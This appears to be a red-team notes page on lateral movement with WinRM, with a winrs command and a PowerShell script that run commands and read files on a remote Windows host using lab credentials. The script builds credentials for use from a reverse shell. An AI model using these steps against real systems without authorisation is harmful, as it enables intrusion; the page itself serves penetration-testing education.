# Windows Remote Management

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol (Microsoft's implementation of WS-Management over HTTP) that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). By default it listens on TCP 5985 (HTTP) and TCP 5986 (HTTPS). It may be called with the `winrm` command or by any number of programs such as PowerShell.

### WinRS

Without the use of PowerShell, code execution on a remote host can be accomplished with the following syntax (the `-r:` argument is the target, `-u:`/`-p:` are the credentials, and everything after them is the command to run):

```
winrs -r:DESKTOP-DELTA.dc1.dominioncyber.local -u:Adrian -p:Dathura1 calc.exe
```

{% hint style="info" %}
WinRS is a good option when credentials have to be supplied from a shell on your attacking box: it takes them on the command line, so nothing depends on the GUI credential prompt, which you only get to see when you have an RDP session. Keep in mind that a password passed this way lands in any command-line auditing on the source host (process creation events), so it is not a quiet technique.
{% endhint %}

Here is a demo of the lateral movement executing:

![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-J3-noxtH-awphmJ_h%2F-M-J6ImD_pkXAZl_NSey%2Fwinrs-lateral-movement.gif?alt=media\&token=aa816157-76a5-47ef-b9df-4772025adae9)

### PSRemoting

PowerShell Remoting is essentially a native Windows remote command execution feature that is built on top of the Windows Remote Management (WinRM) protocol: the remote end runs a PowerShell host inside the WinRM service and your commands and their results travel as serialized objects over the WinRM channel.

{% hint style="info" %}
This feature is not enabled by default on client editions of Windows (it is enabled by default on Windows Server 2012 and later). Enabling it requires admin privileges on the local and remote machine, and connecting requires an account that is a local administrator (or a member of the Remote Management Users group) on the remote host. It is supported on Windows Vista with Service Pack 1 or later, Windows 7, Windows Server 2008, and Windows Server 2012 and after.
{% endhint %}

Now for a simple demonstration: I create a remote PSSession on the targeted machine.

Enumeration here shows that I am the user John on the workstation DESKTOP-CHARLIE. I wrote a small `proof.txt` to fetch from the target.

![Charlie machine](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LTvxVmFliwQ9H0Vhh%2F-M-LUG7wIka4bO7Es2Uz%2Fimage.png?alt=media\&token=8fce8b52-f7ce-4962-85b2-d7c92844878d)

Then on my Delta machine that small file sits on the Desktop, with the user John logged in.

![Delta](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LXlWCF91jEraiqsRl%2F-M-LY3hjfw5sGA8GWMSo%2Fimage.png?alt=media\&token=8291813e-c785-4559-91d1-5944e0746f3f)

A login window prompts for the credentials.

![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LYEtsoM2viVSQm-yO%2F-M-LY_VP_RRMZjlkpHTd%2Fimage.png?alt=media\&token=d80936d2-6090-4170-85bd-5569cfc1d177)

Once the credentials are accepted, a PSSession is started on the remote host.

![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LYEtsoM2viVSQm-yO%2F-M-LYmkWtFkGiIr02en1%2Fimage.png?alt=media\&token=df4f3280-586e-4c08-812d-faae3f8d9ea6)

And I can grab the `proof.txt` file contents.

![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LYqUvMbo5cl1Ee4bP%2F-M-LZ-zg0JRW1OXYCJO1%2Fimage.png?alt=media\&token=3fcb9862-3df9-4f32-b487-a489bf79c703)
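The same sequence scripted in PowerShell, as an added example that is not part of the original page. It also covers the point made in the WinRS hint above: the credential object is built up front so no GUI prompt appears, which is what you need from a non-interactive shell. The target hostname is taken from the `winrs` command earlier on the page; the `dc1\John` account, the placeholder password and the `Desktop\proof.txt` path are assumptions for the walkthrough, not values from the page.

```powershell
# Added example, not the page's own code. Assumed values: target FQDN (from the winrs
# line above), the dc1\John account, the placeholder password and the proof.txt path.
$Target = 'DESKTOP-DELTA.dc1.dominioncyber.local'

# 1. Check that the target answers on WinRM (TCP 5985 over HTTP by default).
#    Test-WSMan throws if the WS-Management listener is not reachable.
Test-WSMan -ComputerName $Target -ErrorAction Stop | Out-Null

# 2. Build the credential in code instead of calling Get-Credential, which would pop
#    the dialog shown in the screenshots. From a reverse shell there is nobody to
#    click it. The password here is a placeholder (assumption).
$Password = ConvertTo-SecureString 'ChangeMe1!' -AsPlainText -Force
$Cred     = New-Object System.Management.Automation.PSCredential('dc1\John', $Password)

# 3. One-shot remote execution: the scriptblock runs on the target and its output
#    comes back as deserialized objects. Use the FQDN so Kerberos can be used; by IP
#    address WinRM falls back to NTLM and the client needs the host in TrustedHosts
#    (or an HTTPS listener) before it will connect.
Invoke-Command -ComputerName $Target -Credential $Cred -ScriptBlock {
    whoami
    hostname
    Get-Content -Path (Join-Path $env:USERPROFILE 'Desktop\proof.txt')  # assumed path
}

# 4. Persistent session: reuse one connection for several commands, then drop
#    into it interactively (the [DESKTOP-DELTA]: prompt seen in the screenshots).
$Session = New-PSSession -ComputerName $Target -Credential $Cred
Invoke-Command -Session $Session -ScriptBlock { Get-Process | Select-Object -First 5 }
Enter-PSSession -Session $Session
# ... interactive work on the remote host ...
Exit-PSSession

# 5. Clean up: an open PSSession is a live WinRM shell on the target and shows up
#    for defenders (wsmprovhost.exe process, WinRM operational log).
Remove-PSSession -Session $Session
```

Note that on an HTTP listener the session payload is still encrypted at the message level when Kerberos or NTLM authentication is negotiated; only Basic authentication with unencrypted traffic explicitly allowed sends the commands in the clear.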

**Demo:**

![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LZOhM6fe5IwuQ3RpX%2F-M-La6L1YRKPTTmoQair%2FPS-REMOTE.gif?alt=media\&token=f0fe8a75-eb3c-4792-9d82-0b986b5cfbe5)

References:

{% embed url="<https://blog.netspi.com/powershell-remoting-cheatsheet/>" %}
